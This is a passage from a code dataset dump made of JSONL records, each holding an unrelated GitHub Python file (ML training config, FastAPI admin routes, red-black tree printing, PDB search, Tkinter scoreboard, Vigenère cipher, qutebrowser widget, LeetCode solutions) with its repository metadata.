lst[idx * package_per_col + i]\n                display_func(column, col_package)","repo_name":"danielhocevar/DissectingNPM","sub_path":"site_functions.py","file_name":"site_functions.py","file_ext":"py","file_size_in_byte":15083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40905876699","text":"import logging\nimport os\nfrom typing import Any, Dict, List\n\nfrom hydra.utils import instantiate\nfrom lightning.pytorch.callbacks.callback import Callback\nfrom lightning.pytorch.loggers import Logger, TensorBoardLogger\nfrom omegaconf import OmegaConf\nfrom pkg_resources import resource_filename\nfrom pydantic.utils import deep_update\n\nCONFIG_MAPPER = {\n    \"lr\": \"train_lr.yaml\",\n    \"bert\": \"train_bert.yaml\",\n    \"lstm\": \"train_lstm.yaml\",\n    \"deebert\": \"train_deebert.yaml\",\n    \"fastbert\": \"train_fastbert.yaml\",\n    \"theseusbert\": \"train_theseus_bert.yaml\",\n}\n\n\nclass TrainAssistant(object):\n    \"\"\"\n    Helper object that holds and instantiates everything needed for training.\n\n    For every available model for fine-tuning it will load a default configuration that\n    can be overwritten by passing some keyword arguments.\n    It contains four main sub-configurations:\n\n    - *general*: various high level parameters unrelated to the training procedure\n    - *train*: training related parameters\n    - *model*: parameters necessary to build and define the model\n    - *data*: parameters necessary to define the dataset and featurize it\n\n    Args:\n        name (str):\n            name of the base model to fine-tune\n        general_kwargs (Dict[str, Any]):\n            keyword arguments that can add to or overwrite the default 'general' configuration\n        train_kwargs (Dict[str, Any]):\n            keyword arguments that can add to or overwrite the default 'train' configuration\n        model_kwargs (Dict[str, Any]):\n            keyword arguments that can add to or overwrite the default 'model' configuration\n        data_kwargs (Dict[str, Any]):\n            keyword arguments that can add to or overwrite the default 'data' configuration\n        logger_kwargs 
(Dict[str, Any]):\n            keyword arguments that can add to or overwrite the default 'logger' configuration\n        callbacks (List[Callback]):\n            list of callbacks to use during training\n    \"\"\"\n\n    def __init__(\n        self,\n        name: str,\n        general_kwargs: Dict[str, Any] = None,\n        train_kwargs: Dict[str, Any] = None,\n        model_kwargs: Dict[str, Any] = None,\n        data_kwargs: Dict[str, Any] = None,\n        logger_kwargs: Dict[str, Any] = None,\n        callbacks: List[Callback] = None,\n    ):\n        try:\n            conf = OmegaConf.load(\n                resource_filename(\n                    \"bert_squeeze\",\n                    os.path.join(\"assistants/configs\", CONFIG_MAPPER[name]),\n                )\n            )\n        except KeyError:\n            raise ValueError(\n                f\"'{name}' is not a valid configuration name, please use one of the following: {CONFIG_MAPPER.keys()}\"\n            )\n        if (\n            data_kwargs is not None\n            and data_kwargs.get(\"dataset_config\", {}).get(\"path\") is not None\n        ):\n            logging.warning(\n                \"Found value for `dataset_config.path` which conflicts with parameter `dataset_path`, using \"\n                \"value from the latter.\"\n            )\n\n            conf[\"data\"][\"dataset_config\"] = deep_update(\n                conf[\"data\"][\"dataset_config\"], data_kwargs[\"dataset_config\"]\n            )\n            del data_kwargs[\"dataset_config\"]\n\n        # use a distinct loop variable so the `name` argument is not shadowed\n        for key, kws in zip(\n            [\"general\", \"train\", \"model\", \"data\", \"logger\", \"callbacks\"],\n            [\n                general_kwargs,\n                train_kwargs,\n                model_kwargs,\n                data_kwargs,\n                logger_kwargs,\n                callbacks,\n            ],\n        ):\n            if kws is not None:\n                conf[key] = deep_update(conf[key], kws)\n\n        self.name = name\n        self.general = conf[\"general\"]\n        self.train = conf[\"train\"]\n        self._model_conf = conf[\"model\"]\n        self._data_conf = conf[\"data\"]\n        self._logger_conf = conf.get(\"logger\")\n        self._callbacks_conf = conf.get(\"callbacks\", [])\n\n        self._model = None\n        self._data = None\n        self._logger = None\n        self._callbacks = None\n\n    @property\n    def model(self) -> Any:\n        \"\"\"\"\"\"\n        if self._model is None:\n            self.model = instantiate(self._model_conf)\n        return self._model\n\n    @model.setter\n    def model(self, value: Any) -> None:\n        \"\"\"\"\"\"\n        self._model = value\n\n    @property\n    def data(self) -> Any:\n        \"\"\"\"\"\"\n        if self._data is None:\n            data = instantiate(self._data_conf)\n            data.prepare_data()\n            data.setup()\n            self.data = data\n        return self._data\n\n    @data.setter\n    def data(self, value: Any) -> None:\n        \"\"\"\"\"\"\n        self._data = value\n\n    @property\n    def logger(self) -> Logger:\n        \"\"\"\"\"\"\n        if self._logger is None:\n            if self._logger_conf is not None:\n                self.logger = instantiate(self._logger_conf)\n            else:\n                self.logger = TensorBoardLogger(self.general[\"output_dir\"])\n        return self._logger\n\n    @logger.setter\n    def logger(self, value: Logger) -> None:\n        \"\"\"\"\"\"\n        self._logger = value\n\n    @property\n    def callbacks(self) -> List[Callback]:\n        \"\"\"\"\"\"\n        if self._callbacks is None:\n            if self._callbacks_conf is not None:\n                self.callbacks = [\n                    instantiate(callback) for callback in self._callbacks_conf\n                ]\n            else:\n                self.callbacks = []\n        return self._callbacks\n\n    @callbacks.setter\n    def callbacks(self, value: List[Callback]) -> None:\n        \"\"\"\"\"\"\n        self._callbacks = value\n\n    def __repr__(self):\n        return f\"\"\n\n    def __str__(self):\n        return f\"TrainAssistant_{self.name}\"\n","repo_name":"JulesBelveze/bert-squeeze","sub_path":"bert_squeeze/assistants/train_assistant.py","file_name":"train_assistant.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"63"} +{"seq_id":"24097653877","text":"import asyncio\nfrom concurrent.futures import 
ThreadPoolExecutor\nfrom time import time\n\nimport requests\n\nurls = [\"https://nodejs.org/uk/\", \"https://www.python.org/\", \"https://faker.readthedocs.io/\", \"https://github.com/\",\n \"https://goit.global/ua/\"]\n\n\ndef get_url_info(url):\n r = requests.get(url)\n return url, r.text[:50]\n\n\nasync def get_url_info_async(urls):\n loop = asyncio.get_running_loop()\n with ThreadPoolExecutor(5) as executor:\n futures = [loop.run_in_executor(executor, get_url_info, url) for url in urls]\n r = await asyncio.gather(*futures)\n return r\n\nif __name__ == '__main__':\n start = time()\n results = [get_url_info(url) for url in urls]\n print(results)\n print(time() - start)\n print(\"------------\")\n start = time()\n results = asyncio.run(get_url_info_async(urls))\n print(results)\n print(time() - start)","repo_name":"GoIT-Python-Web/Py7Web","sub_path":"m06_01/10_io_task.py","file_name":"10_io_task.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7254428540","text":"from fastapi import APIRouter, Depends, status, Query, HTTPException\nfrom models.models import *\nfrom services.AuthService import *\nfrom configs.environment import get_environment_variables\nfrom .auth import get_current_user\n\nenv = get_environment_variables()\n\nAdminRouter = APIRouter(prefix=f\"/{env.API_VERSION}/admin\", tags=[\"admin\"])\n\n\n@AdminRouter.post(\"/signup\")\nasync def register(user: AdminUser_PydanticIn):\n user_info = user.dict()\n user_info[\"password\"] = get_hash_password(user_info[\"password\"])\n user_obj = await AdminUser.create(**user_info)\n new_user = await AdminUser_Pydantic.from_tortoise_orm(user_obj)\n print(new_user)\n return {\n \"status\": \"ok\",\n \"data\": f\"User is created with username {new_user.username}\",\n }\n\n\n@AdminRouter.post(\"/login\")\nasync def user_login(user: AdminUser_PydanticIn = Depends(get_current_user)):\n admin_user = await AdminUser.get(id=user.id)\n return {\n \"status\": \"ok\",\n \"data\": {\n \"user_id\": admin_user.id,\n \"username\": admin_user.username,\n \"email\": admin_user.email,\n \"created_at\": admin_user.created_at.strftime(\"%Y-%m-%d %H:%M:%S\"),\n },\n }\n","repo_name":"waysiPire0/ecommerceAdminFastApi","sub_path":"routers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"42854988823","text":"# from RBTreeNode import RBTreeNode\nfrom RBTree import RBTree\nimport random\n\ndef inorder_traversal(root):\n if root == RBTree.TNIL:\n return \n inorder_traversal(root.left)\n print('{}: {}'.format(root.val, 'R' if root.isRed else 'B'))\n inorder_traversal(root.right)\n\n# slightly modified version of the algorithm by https://stackoverflow.com/users/4237254/bck\n# which is a stand alone version of the algorithm by https://stackoverflow.com/users/1143396/j-v\n# copypasta'd from https://stackoverflow.com/questions/34012886\ndef print_tree(root, val=\"val\", left=\"left\", right=\"right\"):\n def display(root, val=val, left=left, right=right):\n \"\"\"Returns list of strings, width, height, and horizontal coordinate of the root.\"\"\"\n # No child.\n if root.right is RBTree.TNIL and root.left is RBTree.TNIL:\n line = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n width = len(line)\n height = 1\n middle = width // 2\n return [line], width, height, middle\n\n # Only left child.\n if root.right is RBTree.TNIL:\n 
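# Render the left subtree first: display() returns its text lines, width,\n            # height, and root column, which are used to position this node's label\n            # and the connecting '/' directly above the child's root.\n            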
lines, n, p, x = display(root.left)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s\n second_line = x * ' ' + '/' + (n - x - 1 + u) * ' '\n shifted_lines = [line + u * ' ' for line in lines]\n return [first_line, second_line] + shifted_lines, n + u, p + 2, n + u // 2\n\n # Only right child.\n if root.left is RBTree.TNIL:\n lines, n, p, x = display(root.right)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = s + x * '_' + (n - x) * ' '\n second_line = (u + x) * ' ' + '\\\\' + (n - x - 1) * ' '\n shifted_lines = [u * ' ' + line for line in lines]\n return [first_line, second_line] + shifted_lines, n + u, p + 2, u // 2\n\n # Two children.\n left, n, p, x = display(root.left)\n right, m, q, y = display(root.right)\n s = '{}:{}'.format(root.val, 'R' if root.isRed else 'B')\n u = len(s)\n first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s + y * '_' + (m - y) * ' '\n second_line = x * ' ' + '/' + (n - x - 1 + u + y) * ' ' + '\\\\' + (m - y - 1) * ' '\n if p < q:\n left += [n * ' '] * (q - p)\n elif q < p:\n right += [m * ' '] * (p - q)\n zipped_lines = zip(left, right)\n lines = [first_line, second_line] + [a + u * ' ' + b for a, b in zipped_lines]\n return lines, n + m + u, max(p, q) + 2, n + u // 2\n\n lines, *_ = display(root, val, left, right)\n for line in lines:\n print(line)\n\nif __name__== '__main__':\n rbtree = RBTree()\n nums = list(range(16, 32))\n random.shuffle(nums)\n for val in nums:\n rbtree.insert(val)\n print('Generated Tree:')\n print('Minimum: {}, Maximum:{}'.format(rbtree.minimum(rbtree.root).val, rbtree.maximum(rbtree.root).val))\n print_tree(rbtree.root)\n \n to_delete = []\n l = list(range(len(nums)))\n for i in range(3):\n index = random.choice(l)\n l.remove(index)\n to_delete.append(nums[index])\n\n for i in to_delete:\n s = rbtree.successor(i).val if rbtree.successor(i) is not None else None\n p = rbtree.predecessor(i).val if rbtree.predecessor(i) is not None else None\n print('\\nSuccessor({}) = {}'.format(i, s))\n print('Predecessor({}) = {}'.format(i, p))\n rbtree.delete(i)\n print('Tree state after Delete({}):\\n'.format(i))\n print_tree(rbtree.root)","repo_name":"mdmn07C5/RedBlackTree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25371936310","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis program/module facilitates posting queries to the RCSB Protein databank.\nThe script is currently limited to perform searches on ligand name. An\noptional argument can be provided as similarity cutoff to exclude \nhomologous proteins. The PDB structures found are automatically downloaded.\n\nUsage:\n pdbsearch.py ligand [cutoff]\n\nTODO:\n This program/module will be extended in the near future to\n\n #. bring more of the PDB search facilities to the command-line\n #. provide a full command-line interface for searching/listing/downloading\n\"\"\"\n\n__author__ = 'Tsjerk A. 
Wassenaar'\n__copyright__ = 'Copyright 2018, University of Groningen'\n__version__ = '0.1.0dev0'\n__license__ = 'Apache License 2.0'\n\n\n## IMPORTS\n\nimport sys\nfrom urllib.error import HTTPError\nimport urllib.request as urllib\n\n\n## CONSTANTS\n\nPDB = 'http://www.rcsb.org/pdb/'\nPDBREST = PDB + 'rest/search'\nPDBDOWN = PDB + 'download/downloadFile.do?fileFormat=pdb&compression=NO&structureId='\n\nPDBREFINE = \"\"\"\n \n {level}\n {conjunction}\n \n {query}\n \n \n\"\"\"\n\n\n## CLASSES\n \nclass PDBQuery:\n def __init__(self, query=None):\n self.ids = []\n self.query = []\n if query:\n self.query = [\"or\", query]\n \n def __and__(self, other):\n out = PDBQuery()\n out.query = self.query + ['and'] + other.query[1:]\n return out\n \n def __or__(self, other):\n out = PDBQuery()\n out.query = self.query + ['or'] + other.query[1:]\n return out\n\n def __str__(self):\n level = 0\n out = ['']\n querit = iter(self.query)\n for item in querit:\n conjunction = item\n query = \"\\n \".join(next(querit).split(\"\\n\"))\n out.append(PDBREFINE.format(**locals()))\n level += 1\n out.append('')\n return \"\\n\".join(out)\n \n def search(self):\n f = urllib.urlopen(PDBREST, data=str(self).encode('utf-8'))\n self.ids = [ item.decode('utf-8') for item in f.read().split() ]\n if self.ids:\n print(\"Found number of PDB entries:\", len(self.ids))\n return self.ids\n print(\"Failed to retrieve results\")\n return None\n \n def download(self):\n if not self.ids:\n self.search()\n for pdbid in self.ids:\n try:\n print(pdbid, end=\" \")\n yield pdbid, urllib.urlopen(PDBDOWN + pdbid).read()\n except HTTPError as e:\n sys.stderr.write(\"Failed retrieving {}:\".format(pdbid))\n sys.stderr.write(e)\n continue\n\n \nclass PDBQ_Ligand(PDBQuery):\n \"\"\"Ligand query for RCSB protein database\"\"\"\n def __init__(self, name, comparator=\"Contains\", polymeric=\"Any\"):\n PDBQuery.__init__(self)\n typ = \"org.pdb.query.simple.ChemCompNameQuery\"\n self.query = [\n \"or\", \n (\n \"{typ}\\n\"\n \"{comparator}\\n\"\n \"{name}\\n\"\n \"{polymeric}\"\n ).format(**locals())\n ]\n\n \nclass PDBQ_Refine(PDBQuery):\n \"\"\"Query for refinement of PDB search result based on level of homology\"\"\"\n def __init__(self, level=90):\n PDBQuery.__init__(self)\n typ = \"org.pdb.query.simple.HomologueReductionQuery\"\n self.query = [\n \"or\",\n (\n \"{typ}\\n\"\n \"90\"\n ).format(**locals())\n ]\n \n\n## FUNCTIONS\n\n\n## MAIN\ndef main(args):\n\n if len(args) < 2:\n ...\n return 1\n\n query = PDBQ_Ligand(args[1])\n if len(args) > 2:\n query |= PDBQ_Refine(int(args[2]))\n \n # Search and download PDB ids matching the query\n # Homology will \n for pdbid, data in query.download():\n open(\"{}.pdb\".format(pdbid), 'wb').write(data)\n\n return 0\n\n\nif __name__ == \"__main__\":\n exco = main(sys.argv)\n sys.exit(exco)\n","repo_name":"Tsjerk/pdbsearch","sub_path":"pdbsearch.py","file_name":"pdbsearch.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"74987415561","text":"import json\nimport numpy as np\nimport pandas as pd\nfrom datetime import date\nfrom joblib import load\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nimport os\nfrom functools import partial\nfrom Shot import Player, Shot\nfrom Draw_HS_Court import draw_HS_court\nfrom Player_Entry import player_entry, submit_teams\n\ndef data_entry():\n root = Tk()\n # root.geometry(\"584x643\")\n # root.resizable(width=False, height=False)\n 
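# Editor's note (hedged fix): the scoreboard widgets below read home_goals, away_goals,\n    # home_SOT and away_SOT, which this checkpoint never defines; initialising them to zero\n    # here is an assumption so the Label() calls do not raise NameError.\n    home_goals = away_goals = 0\n    home_SOT = away_SOT = 0\n    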
Grid.rowconfigure(root, 0, weight=1)\n Grid.columnconfigure(root, 0, weight=1)\n\n global fig, ax, circle\n global home_points, away_points, home_shots, away_shots, shot_index, home_team, away_team, home_list, away_list\n\n home_points = 0\n away_points = 0\n home_shots = 0\n away_shots = 0\n shot_index = 0\n List = []\n\n team_label_font = tkFont.Font(family='Helvetica', size=20, weight='bold')\n team_entry_font = tkFont.Font(family='Hevetica', size=15)\n button_font = tkFont.Font(family='Hevetica', size=12)\n reg_font = tkFont.Font(family='Hevetica', size=12)\n\n\n team_frame = LabelFrame(root, padx=10, pady=10)\n team_frame.pack(side=TOP, padx=10, pady=10)\n\n home_label = Label(team_frame, text=\"Home\", font=team_label_font)\n away_label = Label(team_frame, text=\"Away\", font=team_label_font)\n\n home_label.grid(row=0, column=0, sticky=N+S+E+W)\n away_label.grid(row=0, column=3, sticky=N+S+E+W)\n\n home_name_label = Label(team_frame, text=home_team, font=team_entry_font)\n away_name_label = Label(team_frame, text=away_team, font=team_entry_font)\n home_name_label.grid(row=1, column=0, padx=(0,20)) # sticky=N+S+E+W)\n away_name_label.grid(row=1, column=3, padx=(20,0)) #, sticky=N+S+E+W)\n\n button_frame = LabelFrame(root)\n button_frame.pack(padx=10, pady=10)\n button1 = Button(button_frame, text='Show Pitch', command=draw_court, font=button_font)\n button1.pack(padx=(5, 50), pady=5, side=LEFT)\n\n save_file_button = Button(button_frame, text='Save Data as .CSV', command=saveCSV, font=button_font)\n save_file_button.pack(padx=(50,5), pady=5, side=RIGHT)\n\n outer = LabelFrame(root)\n outer.pack(padx=10, pady=10)\n\n key = LabelFrame(outer, text=\"Key\", font=reg_font)\n key.pack(side=LEFT)\n key_text1 = Label(key, text=\"Shot Made: LClick (Orange)\", font=reg_font)\n key_text2 = Label(key, text=\"Shot Missed: RClick (Blue)\", font=reg_font)\n key_text1.pack(fill=BOTH, expand=YES)\n key_text2.pack(fill=BOTH, expand=YES)\n\n scoreboard = LabelFrame(outer, text=\"Game Scoreboard\", font=reg_font)\n scoreboard.pack(side=RIGHT)\n scoreboard_home = Label(scoreboard, text=\"Home\", font=reg_font)\n scoreboard_away = Label(scoreboard, text=\"Away\", font=reg_font)\n shots_label = Label(scoreboard, text=\"Shots: \", font=reg_font)\n score_frame1 = LabelFrame(scoreboard)\n score_frame2 = LabelFrame(scoreboard)\n score_home_label = Label(score_frame1, text=str(home_goals), font=reg_font)\n score_away_label = Label(score_frame2, text=str(away_goals), font=reg_font)\n shots_home_label = Label(scoreboard, text=str(home_shots), font=reg_font)\n shots_away_label = Label(scoreboard, text=str(away_shots), font=reg_font)\n SOT_label = Label(scoreboard, text=\"SOT: \", font=reg_font)\n SOT_home_label = Label(scoreboard, text=str(home_SOT), font=reg_font)\n SOT_away_label = Label(scoreboard, text=str(away_SOT), font=reg_font)\n scoreboard_home.grid(row=0, column=1)\n scoreboard_away.grid(row=0, column=2)\n score_frame1.grid(row=1, column=1)\n score_frame2.grid(row=1, column=2)\n score_home_label.pack()\n score_away_label.pack()\n shots_label.grid(row=2, column=0)\n shots_home_label.grid(row=2, column=1)\n shots_away_label.grid(row=2, column=2)\n SOT_label.grid(row=3, column=0)\n SOT_home_label.grid(row=3, column=1)\n SOT_away_label.grid(row=3, column=2)\n \n root.mainloop()\n \n \nif __name__ == '__main__':\n home_team, away_team, home_list, away_list = player_entry()\n data_entry()\n 
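\n# Editor's note: draw_court and saveCSV are wired to the buttons above but are neither\n# defined nor imported in this checkpoint; they presumably live in a module missing here,\n# so running this file as-is would raise NameError when the buttons are created.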
","repo_name":"yumamoto164/Basketball-StatsKeeper","sub_path":".ipynb_checkpoints/Data_Entry-checkpoint.py","file_name":"Data_Entry-checkpoint.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40572892277","text":"from blacksheep import Application\nfrom blacksheep import Application\nfrom blacksheep.server.openapi.v3 import OpenAPIHandler\nfrom openapidocs.v3 import Info\nfrom app import *\n\nimport os\n\nif not os.path.exists(\"static\"):\n os.mkdir(\"static\")\n\nif not os.path.exists(\"static/brand\"):\n os.mkdir(\"static/brand\")\n\nif not os.path.exists(\"static/subcategory\"):\n os.mkdir(\"static/subcategory\")\n\napp = Application()\n\napp.serve_files(\"static\")\n\napp.use_cors(\n allow_methods=\"*\",\n allow_origins=\"*\",\n allow_headers=\"*\",\n max_age=300,\n)\n\ndocs = OpenAPIHandler(info=Info(title=\"Example API\", version=\"0.0.1\"))\ndocs.bind_app(app)\n","repo_name":"David2005-15/butique","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43324415344","text":"N, S = map(int, input().split())\n\nbox = list(map(int, input().split()))\n\nResult = 0\nFlag = False\n\n\ndef cal(Sum, Index, F):\n global N, S, box, Flag\n if Index >= N:\n return\n\n sub_sum = Sum + box[Index]\n if sub_sum == S:\n global Result\n Result += 1\n\n cal(sub_sum, Index+1, Flag)\n cal(Sum, Index+1, Flag)\n\n return\n\n\ncal(0, 0, Flag)\n\nprint(Result)\n","repo_name":"leed21542/Algorithm","sub_path":"백준/스택/1725 히스토그램.py","file_name":"1725 히스토그램.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16707196218","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom ...language import Language\nfrom ...attrs import LANG\nfrom ...fr.language_data import get_tokenizer_exceptions, STOP_WORDS\nfrom ...language_data.punctuation import TOKENIZER_INFIXES, ALPHA\n\nimport pytest\n\n\n@pytest.fixture\ndef fr_tokenizer_w_infix():\n SPLIT_INFIX = r'(?<=[{a}]\\')(?=[{a}])'.format(a=ALPHA)\n\n # create new Language subclass to add to default infixes\n class French(Language):\n lang = 'fr'\n\n class Defaults(Language.Defaults):\n lex_attr_getters = dict(Language.Defaults.lex_attr_getters)\n lex_attr_getters[LANG] = lambda text: 'fr'\n tokenizer_exceptions = get_tokenizer_exceptions()\n stop_words = STOP_WORDS\n infixes = TOKENIZER_INFIXES + [SPLIT_INFIX]\n\n return French.Defaults.create_tokenizer()\n\n\n@pytest.mark.parametrize('text,expected_tokens', [(\"l'avion\", [\"l'\", \"avion\"]),\n (\"j'ai\", [\"j'\", \"ai\"])])\ndef test_issue768(fr_tokenizer_w_infix, text, expected_tokens):\n \"\"\"Allow zero-width 'infix' token during the tokenization process.\"\"\"\n tokens = fr_tokenizer_w_infix(text)\n assert len(tokens) == 2\n assert [t.text for t in tokens] == expected_tokens\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/19200_test_issue768.py","file_name":"19200_test_issue768.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"3966917675","text":"# Author: s0lst1c3\n# Description: Simple implementation of the vigenere ciphere\n\nimport random\nfrom sanitizer import sanitize\nfrom string import 
lowercase\n\nrandom.seed()\n\nOFFSET = ord('a')\n\ndef gen(keysize):\n return ''.join(random.sample(lowercase, keysize))\n\ndef enc(m, k):\n m = sanitize(m)\n c = []\n k_len = len(k)\n\n for i in xrange(0, len(m)):\n c.append(chr((ord(m[i])-OFFSET+ord(k[i%k_len])-OFFSET)%26+OFFSET))\n\n return ''.join(c)\n\ndef dec(c, k):\n m = [] \n k_len = len(k)\n\n for i in xrange(0, len(c)):\n m.append(chr(((ord(c[i])-OFFSET)-(ord(k[i%k_len])-OFFSET))%26+OFFSET))\n\n return ''.join(m)\n\n","repo_name":"s0lst1c3/basic-ciphers","sub_path":"python/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16793765798","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal, QTimer, Qt, QSize\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QLabel, QSizePolicy\n\nfrom qutebrowser.config import config\nfrom qutebrowser.utils import usertypes\n\n\nclass Message(QLabel):\n\n \"\"\"A single error/warning/info message.\"\"\"\n\n def __init__(self, level, text, replace, parent=None):\n super().__init__(text, parent)\n self.replace = replace\n self.setAttribute(Qt.WA_StyledBackground, True)\n stylesheet = \"\"\"\n padding-top: 2px;\n padding-bottom: 2px;\n \"\"\"\n if level == usertypes.MessageLevel.error:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.error.bg }};\n color: {{ conf.colors.messages.error.fg }};\n font: {{ conf.fonts.messages.error }};\n border-bottom: 1px solid {{ conf.colors.messages.error.border }};\n \"\"\"\n elif level == usertypes.MessageLevel.warning:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.warning.bg }};\n color: {{ conf.colors.messages.warning.fg }};\n font: {{ conf.fonts.messages.warning }};\n border-bottom:\n 1px solid {{ conf.colors.messages.warning.border }};\n \"\"\"\n elif level == usertypes.MessageLevel.info:\n stylesheet += \"\"\"\n background-color: {{ conf.colors.messages.info.bg }};\n color: {{ conf.colors.messages.info.fg }};\n font: {{ conf.fonts.messages.info }};\n border-bottom: 1px solid {{ conf.colors.messages.info.border }}\n \"\"\"\n else: # pragma: no cover\n raise ValueError(\"Invalid level {!r}\".format(level))\n # We don't bother with set_register_stylesheet here as it's short-lived\n # anyways.\n config.set_register_stylesheet(self, stylesheet=stylesheet,\n update=False)\n\n\nclass MessageView(QWidget):\n\n \"\"\"Widget which stacks error/warning/info messages.\"\"\"\n\n update_geometry = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self._messages = []\n self._vbox = QVBoxLayout(self)\n self._vbox.setContentsMargins(0, 0, 0, 0)\n self._vbox.setSpacing(0)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)\n\n self._clear_timer = QTimer()\n self._clear_timer.timeout.connect(self.clear_messages)\n config.instance.changed.connect(self._set_clear_timer_interval)\n\n self._last_text = None\n\n def sizeHint(self):\n \"\"\"Get the proposed height for the view.\"\"\"\n height = sum(label.sizeHint().height() for label in self._messages)\n # The width isn't really relevant as we're expanding anyways.\n return QSize(-1, height)\n\n @config.change_filter('messages.timeout')\n def _set_clear_timer_interval(self):\n \"\"\"Configure self._clear_timer according to the config.\"\"\"\n interval = config.val.messages.timeout\n if interval > 0:\n interval *= min(5, len(self._messages))\n self._clear_timer.setInterval(interval)\n\n @pyqtSlot()\n def 
clear_messages(self):\n \"\"\"Hide and delete all messages.\"\"\"\n for widget in self._messages:\n self._vbox.removeWidget(widget)\n widget.hide()\n widget.deleteLater()\n self._messages = []\n self._last_text = None\n self.hide()\n self._clear_timer.stop()\n\n @pyqtSlot(usertypes.MessageLevel, str, bool)\n def show_message(self, level, text, replace=False):\n \"\"\"Show the given message with the given MessageLevel.\"\"\"\n if text == self._last_text:\n return\n\n if replace and self._messages and self._messages[-1].replace:\n old = self._messages.pop()\n old.hide()\n\n widget = Message(level, text, replace=replace, parent=self)\n self._vbox.addWidget(widget)\n widget.show()\n self._messages.append(widget)\n self._last_text = text\n self.show()\n self.update_geometry.emit()\n if config.val.messages.timeout != 0:\n self._set_clear_timer_interval()\n self._clear_timer.start()\n\n def mousePressEvent(self, e):\n \"\"\"Clear messages when they are clicked on.\"\"\"\n if e.button() in [Qt.LeftButton, Qt.MiddleButton, Qt.RightButton]:\n self.clear_messages()\n","repo_name":"cndn/intelligent-code-completion","sub_path":"raw_data/48165_messageview.py","file_name":"48165_messageview.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"63"} +{"seq_id":"36998224616","text":"# -*- coding: utf-8 -*-\nimport os\nfrom setuptools import setup, find_packages\nfrom distutils.core import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nversion = '0.1'\n\nsetup(\n name='django-perobject-permission',\n version=version,\n description=\"Simple, flexible and scalable Django authorization backend that handle per-object permission management\",\n long_description=read('README.md'),\n classifiers=[\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n \"Framework :: Django\",\n \"Environment :: Web Environment\",\n ],\n keywords=['authorization', 'backends', 'django', 'rules', 'permissions', 'rulez','perobject'],\n author='Lodato Luciano',\n author_email='lodato.luciano@gmail.com',\n url='http://github.com/lodatol/django-perobject-permission',\n license='BSD',\n packages=find_packages(),\n zip_safe=False,\n)\n","repo_name":"lodatol/django-perobject-permission","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"36129042399","text":"class Solution:\n def PredictTheWinner(self, nums) -> bool:\n if len(nums) % 2 == 0:\n return True\n n = len(nums)\n dp = [[0] * n for i in range(n)]\n for i in range(n):\n dp[i][i] = nums[i]\n for i in range(n-2, -1, -1): # idx n-1 is filled with nums[n-1]\n for j in range(i+1, n):\n dp[i][j] = max(nums[i] - dp[i+1][j], nums[j] - dp[i][j-1])\n return dp[0][-1] >= 0\n\n \"\"\"This solution used the intuition that if our opponent's score is n, then our score is sum(nums) - n.\nSo for each iteration:\n\nPass the sum of nums summ\nIf There are only 2 numbers in nums - return max(nums)\nGet opponents score for both condition\nIf first number is chosen choose_first\nIf last number is chosen choose_last\nReturn the maximum of the both scores we can get\"\"\"\n\n def PredictTheWinner2(self, nums) -> bool:\n total = sum(nums)\n if not len(nums) % 
